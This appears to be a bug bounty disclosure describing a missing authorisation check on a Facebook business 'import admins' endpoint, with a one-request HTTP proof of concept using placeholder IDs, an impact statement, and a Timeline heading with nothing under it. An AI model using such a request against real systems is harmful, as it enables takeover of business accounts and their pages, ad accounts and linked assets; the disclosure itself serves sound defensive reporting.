There is a call to import admins to a business account. The call at the time didn’t seem to have any permissions set to it. This meant it was possible to add oneself as an admin to any business.

Proof of Concept

HTTP POST /business/aymc_assets/admins/import/ Host: facebook.com business_id=TARGET_BUSINESS_ID admin_id=MALICIOUS_USER_ID session_id=SESSION_ID

This will add the user to the business as an administrator.

Impact

This could have let an attacker without an existing role, take over any business account and gain access to various business assets (Facebook pages, Ad accounts, applications, Instagram accounts) connected to the business.

Timeline